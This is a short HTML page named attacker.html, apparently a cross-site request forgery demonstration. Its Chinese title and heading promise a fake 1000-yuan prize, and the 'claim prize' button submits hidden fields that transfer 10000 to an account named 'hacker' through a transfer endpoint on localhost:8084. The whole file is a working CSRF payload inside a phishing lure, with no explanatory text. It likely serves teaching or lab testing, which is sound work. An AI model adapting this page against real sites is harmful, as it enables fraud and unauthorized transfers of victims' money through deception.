<!-- attacker.html -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>免费抽奖！点击领取1000元</title>
</head>
<body>
<h1>恭喜你中奖了！点击下方按钮领取奖金！</h1>
<form action="http://localhost:8084/transfer" method="POST">
    <input type="hidden" name="to" value="hacker">
    <input type="hidden" name="amount" value="10000">
    <button type="submit">领取奖金</button>
</form>
</body>
</html>
